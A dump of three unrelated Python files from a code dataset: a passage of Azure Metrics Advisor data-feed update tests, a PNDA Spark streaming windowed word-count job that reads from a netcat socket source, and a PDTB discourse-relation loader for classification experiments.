            self.assertEqual(updated.ingestion_settings.data_source_request_concurrency, 1)
            self.assertEqual(updated.ingestion_settings.ingestion_retry_delay, 1)
            self.assertEqual(updated.ingestion_settings.stop_retry_after, 1)
            self.assertEqual(updated.rollup_settings.rollup_type, "AlreadyRollup")
            self.assertEqual(updated.rollup_settings.rollup_method, "Sum")
            self.assertEqual(updated.rollup_settings.rollup_identification_value, "sumrollup")
            self.assertEqual(updated.missing_data_point_fill_settings.fill_type, "CustomValue")
            self.assertEqual(updated.missing_data_point_fill_settings.custom_fill_value, 2)
            self.assertEqual(updated.access_mode, "Public")
            self.assertEqual(updated.viewer_emails, ["updated"])
            self.assertEqual(updated.status, "Paused")
            self.assertEqual(updated.action_link_template, "updated")
            self.assertEqual(updated.source.query, "get data")
        finally:
            await self.admin_client.delete_data_feed(data_feed.id)
@unittest.skip("skip test")
@AzureTestCase.await_prepared_test
async def test_update_data_feed_by_reseting_properties(self):
    """Pass None for each property to reset it to its service-side default.

    The commented-out assertions document properties the service does not
    currently clear; the active assertions pin the observed default values.
    """
    async with self.admin_client:
        data_feed = await self._create_data_feed_for_update("update")
        try:
            await self.admin_client.update_data_feed(
                data_feed.id,
                name="update",
                data_feed_description=None,
                timestamp_column=None,
                ingestion_start_offset=None,
                data_source_request_concurrency=None,
                ingestion_retry_delay=None,
                stop_retry_after=None,
                rollup_type=None,
                rollup_method=None,
                rollup_identification_value=None,
                auto_rollup_group_by_column_names=None,
                fill_type=None,
                custom_fill_value=None,
                access_mode=None,
                viewer_emails=None,
                status=None,
                action_link_template=None,
            )
            updated = await self.admin_client.get_data_feed(data_feed.id)
            self.assertEqual(updated.name, "update")
            # self.assertEqual(updated.data_feed_description, "")  # doesn't currently clear
            # self.assertEqual(updated.schema.timestamp_column, "")  # doesn't currently clear
            self.assertEqual(updated.ingestion_settings.ingestion_begin_time,
                             datetime.datetime(2019, 10, 1, tzinfo=tzutc()))
            # -1 / 0 are the service's "unset" sentinels for these settings.
            self.assertEqual(updated.ingestion_settings.ingestion_start_offset, -1)
            self.assertEqual(updated.ingestion_settings.data_source_request_concurrency, 0)
            self.assertEqual(updated.ingestion_settings.ingestion_retry_delay, -1)
            self.assertEqual(updated.ingestion_settings.stop_retry_after, -1)
            self.assertEqual(updated.rollup_settings.rollup_type, "NoRollup")
            self.assertEqual(updated.rollup_settings.rollup_method, "None")
            self.assertEqual(updated.rollup_settings.rollup_identification_value, None)
            self.assertEqual(updated.missing_data_point_fill_settings.fill_type, "SmartFilling")
            self.assertEqual(updated.missing_data_point_fill_settings.custom_fill_value, 0)
            self.assertEqual(updated.access_mode, "Private")
            # self.assertEqual(updated.viewer_emails, ["viewers"])  # doesn't currently clear
            self.assertEqual(updated.status, "Active")
            # self.assertEqual(updated.action_link_template, "updated")  # doesn't currently clear
        finally:
            await self.admin_client.delete_data_feed(data_feed.id)
| StarcoderdataPython |
# File: spark2-streaming-python/app-package/src/main/resources/sparkStreaming/example/job.py
#
# Name: Job.py
# Purpose: Application entry point to create, configure and start spark streaming job.
# Author: PNDA team
#
# Created: 22/01/2018
#
#
#
# Copyright (c) 2018 Cisco and/or its affiliates.
#
# This software is licensed to you under the terms of the Apache License, Version 2.0 (the "License").
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# The code, technical concepts, and all information contained herein, are the property of Cisco Technology, Inc.
# and/or its affiliated entities, under various laws including copyright, international treaties, patent,
# and/or contract. Any use of the material herein must be in accordance with the terms of the License.
# All rights not expressly granted by the License are reserved.
#
# Unless required by applicable law or agreed to separately in writing, software distributed under the
# License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied.
#
# Attribution:
# The calculation performed is taken from the Spark 2 example "structured streaming event time window example"
# https://github.com/apache/spark/blob/v2.2.1/examples/src/main/python/sql/streaming/structured_network_wordcount_windowed.py
#
from datetime import datetime
from pyspark.sql import SparkSession
from pyspark.sql.functions import explode
from pyspark.sql.functions import split
from pyspark.sql.functions import window
# Numeric log levels: a larger value means more verbose output.
LOG_LEVEL_ERROR = 0
LOG_LEVEL_INFO = 1
LOG_LEVEL_DEBUG = 2
# Active application log level; reassigned in main() from application.properties.
APP_LOG_LEVEL = LOG_LEVEL_INFO
def log_level_name(level):
    """Return the display name for a numeric log level.

    Any value other than LOG_LEVEL_DEBUG / LOG_LEVEL_INFO maps to 'ERROR'.
    """
    if level == LOG_LEVEL_DEBUG:
        return 'DEBUG'
    return 'INFO' if level == LOG_LEVEL_INFO else 'ERROR'
def log_level_value(level):
    """Return the display name for a raw integer log level.

    NOTE(review): despite the name, this returns a level *name* string (like
    log_level_name, but keyed on literal 2/1) -- confirm callers expect a
    string rather than a numeric value.
    """
    if level == 2:
        return 'DEBUG'
    return 'INFO' if level == 1 else 'ERROR'
def log_out(msg_level, message):
    """Print *message* with a timestamp and level name when the level is enabled.

    A message is emitted when APP_LOG_LEVEL >= msg_level.
    """
    if APP_LOG_LEVEL >= msg_level:
        # print() with a single pre-formatted argument behaves identically on
        # Python 2 and 3; the original bare `print` statement was Python-2-only.
        print('%s %s %s' % (str(datetime.now()), log_level_name(msg_level), message))
def main():
    """Entry point: read application.properties, build and run the windowed
    word-count streaming query against a socket source."""
    global APP_LOG_LEVEL
    log_out(LOG_LEVEL_INFO, 'Loading application.properties')
    # Parse simple key=value properties; comment lines are kept as keys that
    # map to None, so they are effectively ignored by the lookups below.
    properties = dict(line.strip().split('=', 1) if not line.strip().startswith('#') else [line, None]
                      for line in open('application.properties'))
    # BUG FIX: the original called log_level_value(['component.log_level']),
    # passing a literal list instead of the property value, so the configured
    # log level was never read.
    # NOTE(review): log_level_value() returns a level *name* string while
    # log_out() compares APP_LOG_LEVEL numerically -- confirm the intended
    # format of component.log_level in application.properties.
    APP_LOG_LEVEL = log_level_value(properties['component.log_level'])
    app_name = properties['component.application']
    checkpoint_directory = properties['component.checkpoint_path']
    input_host = properties['component.input_data_host']
    input_port = properties['component.input_data_port']
    window_interval = properties['component.query_window']
    slide_interval = properties['component.query_slide']
    log_out(LOG_LEVEL_INFO, 'Make sure that before running this application you have')
    log_out(LOG_LEVEL_INFO, 'run the following command to create a source of data:')
    log_out(LOG_LEVEL_INFO, '"nc -lk %s" on %s' % (input_port, input_host))
    log_out(LOG_LEVEL_INFO, 'Creating spark context')
    spark = SparkSession.builder.appName(app_name).getOrCreate()
    # Socket source: one line of text per record, plus an ingestion timestamp.
    lines = spark.readStream.format('socket') \
        .option('host', input_host) \
        .option('port', input_port) \
        .option('includeTimestamp', 'true') \
        .load()
    # Split each line into words, keeping the record timestamp for windowing.
    words = lines.select(
        explode(split(lines.value, ' ')).alias('word'),
        lines.timestamp
    )
    # Sliding event-time window word count, ordered by window for display.
    windowed_counts = words.groupBy(window(words.timestamp, window_interval, slide_interval), words.word) \
        .count() \
        .orderBy('window')
    query = windowed_counts.writeStream.outputMode('complete') \
        .format('console') \
        .option('truncate', 'false')
    # DataStreamWriter.option() configures the same writer object in place,
    # so this call sets checkpointing on ``query``.
    query.option('checkpointLocation', checkpoint_directory)
    log_out(LOG_LEVEL_INFO, 'Starting spark streaming execution')
    query.start().awaitTermination()
# Standard script entry-point guard.
if __name__ == "__main__":
    main()
| StarcoderdataPython |
from misc_utils import get_config, get_logger, tokenize
from discourse_relation import DiscourseRelation
from collections import Counter, defaultdict
import json
import abc
import numpy as np
from os.path import join
import os
# Module-level logger shared by the classes below.
logger = get_logger(__name__)
class Resource(metaclass=abc.ABCMeta):
    """Abstract base for corpus resources.

    Stores the path, the sorted class labels, a label -> index lookup table,
    and eagerly materialises every instance produced by the subclass loader.
    """

    def __init__(self, path, classes):
        self.path = path
        self.classes = sorted(classes)
        self.y_indices = {label: index for index, label in enumerate(self.classes)}
        self.instances = [instance for instance in self._load_instances(path)]

    @abc.abstractmethod
    def _load_instances(self, path):
        """Yield the instances stored at *path*; must be implemented by subclasses."""
        raise NotImplementedError("This class must be subclassed.")
class PDTBRelations(Resource):
    """Discourse relations loaded from a CoNLL-style ``relations.json`` file.

    Each line of the file is one JSON-encoded relation. Relations whose type
    is not in ``filter_type`` (when given) or whose senses are not in the
    configured class list (when ``skip_missing_classes``) are dropped.
    """

    def __init__(self, path, classes, separate_dual_classes, filter_type=None, skip_missing_classes=True):
        # separate_dual_classes: when True, a relation with several senses is
        # split into one single-sense relation per sense.
        self.skip_missing_classes = skip_missing_classes
        self.separate_dual_classes = separate_dual_classes
        self.filter_type = [] if filter_type is None else filter_type
        super().__init__(path, classes)

    def _load_instances(self, path):
        """Yield DiscourseRelation objects parsed from ``path/relations.json``."""
        with open(join(path, 'relations.json')) as file_:
            for line in file_:
                rel = DiscourseRelation(json.loads(line.strip()))
                # BUG FIX: the original guard read
                #   (self.filter_type != [] or self.filter_type is not None)
                # which is always true (filter_type is never None after
                # __init__), so with the default empty filter EVERY relation
                # was skipped.  Only filter when a non-empty filter is given.
                if self.filter_type and rel.relation_type() not in self.filter_type:
                    continue
                if self.separate_dual_classes:
                    for splitted in rel.split_up_senses():
                        if len(splitted.senses()) > 1:
                            raise ValueError("n_senses > 1")
                        if len(splitted.senses()) == 1 and splitted.senses()[0] not in self.y_indices:
                            if self.skip_missing_classes:
                                logger.debug("Sense class {} not in class list, skipping {}".format(splitted.senses()[0], splitted.relation_id()))
                                continue
                        yield splitted
                else:
                    a_class_exist = any(r in self.y_indices for r in rel.senses())
                    if not a_class_exist:
                        if self.skip_missing_classes:
                            logger.debug("Sense {} classes not in class list, skipping {}".format(rel.senses(), rel.relation_id()))
                            continue
                    yield rel

    def get_feature_tensor(self, extractors):
        """Build a (n_instances, 1, n_features) tensor by running each
        extractor over its configured argument text of every relation."""
        rels_feats = []
        n_instances = 0
        last_features_for_instance = None
        for rel in self.instances:
            n_instances += 1
            feats = []
            total_features_per_instance = 0
            for extractor in extractors:
                # These return matrices of shape (1, n_features);
                # they are concatenated on axis 1 below.
                arg_rawtext = getattr(rel, extractor.argument)()
                arg_tokenized = tokenize(arg_rawtext)
                arg_feats = extractor.extract_features(arg_tokenized)
                feats.append(arg_feats)
                total_features_per_instance += extractor.n_features
            if last_features_for_instance is not None:
                # Making sure we have equal number of features per instance
                assert total_features_per_instance == last_features_for_instance
            # BUG FIX: the original never assigned last_features_for_instance,
            # so the per-instance consistency assert above was dead code.
            last_features_for_instance = total_features_per_instance
            rels_feats.append(np.concatenate(feats, axis=1))
        feature_tensor = np.array(rels_feats)
        assert_shape = (n_instances, 1, total_features_per_instance)
        assert feature_tensor.shape == assert_shape, \
            "Tensor shape mismatch. Is {}, should be {}".format(feature_tensor.shape, assert_shape)
        return feature_tensor

    def get_correct(self, indices=True):
        """
        Yield the gold senses for each instance.

        With ``indices`` True, yields class indices (a single index per
        instance when ``separate_dual_classes``, otherwise a list of indices);
        with ``indices`` False, yields the sense strings instead.
        """
        for rel in self.instances:
            senses = rel.senses()
            if self.separate_dual_classes:
                if indices:
                    yield self.y_indices[senses[0]]
                else:
                    yield senses[0]
            else:
                ys = [self.y_indices[sense] for sense in senses]
                if indices:
                    yield ys
                else:
                    yield senses

    def store_results(self, results, store_path):
        """
        Write predicted sense indices as CoNLL output JSON lines.

        Don't forget to use the official scoring script here.
        """
        text_results = [self.classes[res] for res in results]
        # Load test file
        # Output json object with results
        # Deal with multiple instances somehow
        predicted_rels = []
        for text_result, rel in zip(text_results, self.instances):
            if rel.is_explicit():
                rel_type = 'Explicit'
            else:
                rel_type = 'Implicit'
            predicted_rels.append(rel.to_output_format(text_result, rel_type))  # turn string representation into list instance first
        # Store test file
        if not os.path.exists(store_path):
            os.makedirs(store_path)
        with open(join(store_path, 'output.json'), 'w') as w:
            for rel in predicted_rels:
                w.write(json.dumps(rel) + '\n')
        logger.info("Stored predicted output at {}".format(store_path))
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.